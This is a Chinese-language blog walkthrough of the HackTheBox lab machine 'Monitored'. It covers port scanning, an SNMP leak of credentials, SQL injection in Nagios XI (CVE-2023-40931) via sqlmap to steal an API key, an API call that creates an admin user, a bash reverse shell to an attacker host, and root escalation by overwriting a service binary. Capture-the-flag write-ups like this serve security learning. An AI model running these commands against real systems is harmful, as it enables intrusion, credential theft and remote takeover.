Monitored |HackTheBox

发表于 更新于 分类于

Monitored|HackTheBox

刷了几天算法有点昏了,看看HTB换换脑子

直接访问10.10.11.248,跳到nagios.monitored.htb,添加到Hosts

nmap扫端口:

1
nmap -p- -T4 --min-rate 1000 -A -oN ports.nmap 10.10.11.248
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 61:e2:e7:b4:1b:5d:46:dc:3b:2f:91:38:e6:6d:c5:ff (RSA)
|   256 29:73:c5:a5:8d:aa:3f:60:a9:4a:a3:e5:9f:67:5c:93 (ECDSA)
|_  256 6d:7a:f9:eb:8e:45:c2:02:6a:d5:8d:4d:b3:a3:37:6f (ED25519)
80/tcp   open  http       Apache httpd 2.4.56
|_http-title: Did not follow redirect to https://nagios.monitored.htb/
|_http-server-header: Apache/2.4.56 (Debian)
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=nagios.monitored.htb/organizationName=Monitored/stateOrProvinceName=Dorset/countryName=UK
| Not valid before: 2023-11-11T21:46:55
|_Not valid after:  2297-08-25T21:46:55
|_ssl-date: TLS randomness does not represent time
|_http-title: Nagios XI
5667/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/8%OT=22%CT=1%CU=40749%PV=Y%DS=2%DC=T%G=Y%TM=663AC
OS:F8B%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=B)SEQ(SP=107%GCD=1%ISR=10B%TI=
OS:Z%CI=Z%II=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M5
OS:3CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88
OS:%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=Y%DFI=N%T=40%CD=S)

这里还要看下UDP:

1
nmap -sC -sV -sU -T4 -Pn 10.10.11.248
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
PORT      STATE         SERVICE VERSION
68/udp    open|filtered dhcpc
123/udp   open          ntp     NTP v4 (unsynchronized)
| ntp-info: 
|_  
161/udp   open          snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 6f3fa7421af94c6500000000
|   snmpEngineBoots: 36
|_  snmpEngineTime: 18h08m02s
| snmp-netstat: 
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  0.0.0.0:389          0.0.0.0:0
|   TCP  127.0.0.1:25         0.0.0.0:0
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.1:5432       0.0.0.0:0
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:123          *:*
|   UDP  0.0.0.0:161          *:*
|   UDP  0.0.0.0:162          *:*
|   UDP  10.10.11.248:123     *:*
|_  UDP  127.0.0.1:123        *:*
| snmp-sysdescr: Linux monitored 5.10.0-28-amd64 #1 SMP Debian 5.10.209-2 (2024-01-31) x86_64
|_  System uptime: 18h08m2.61s (6528261 timeticks)
| snmp-processes: 
|   1: 
|   2: 
|   3: 
|   4: 
|   6: 
|_  8: 
162/udp   open          snmp    net-snmp; net-snmp SNMPv3 server
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 5a44ab2146ff4c6500000000
|   snmpEngineBoots: 27
|_  snmpEngineTime: 18h08m02s
1047/udp  open|filtered neod1
1105/udp  open|filtered ftranhc
19332/udp open|filtered unknown
22695/udp open|filtered unknown
32385/udp open|filtered unknown
49211/udp open|filtered unknown
61322/udp open|filtered unknown

searchsploit搜了一下全是洞,但是不知道具体版本,还都是Authenticated

dirsearch扫目录

扫出来个/nagios访问下,也需要口令登录

回头看udp扫出来的snmp服务

1
snmpwalk -v 1 -c public 10.10.11.248 >result.txt

找到一组用户密码:svc XjH7VCehowpR1xZB,尝试登录

用户名和密码没问题但是这个账户被禁用了,再试试另一个登陆界面

登陆成功,可以看到nagios版本是4.4.13,没看到对应的洞

CVE-2023-40931:sealldeveloper/CVE-2023-40931-PoC: The sqlmap payload to exploit CVE-2023-40931 (github.com)

存在sql注入,上面是sqlmap的Poc,snmp找到的的username和password可以用

1
sqlmap -D nagiosxi -T xi_users -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch

拿到apikey:IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL

利用apikey添加新用户到系统:curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=1&password=1&name=1&email=1@1.com&auth_level=admin"

登陆成功,在configuration-core config manager找到command面板添加反弹shell命令,要套一层bash -c

1
bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

然后左侧services中添加,选择刚刚添加的命令运行,拿到反弹shell

sudo -l查看可以root权限执行的命令

上面是nagios和npcd的服务,下面的脚本都没有写入权限

通过manage_services.sh查看服务状态

npcd服务调用了/usr/local/nagios/bin/npcd,我们可以修改这个文件

停止npcd服务后修改文件

开启监听,启动服务,收到反弹shell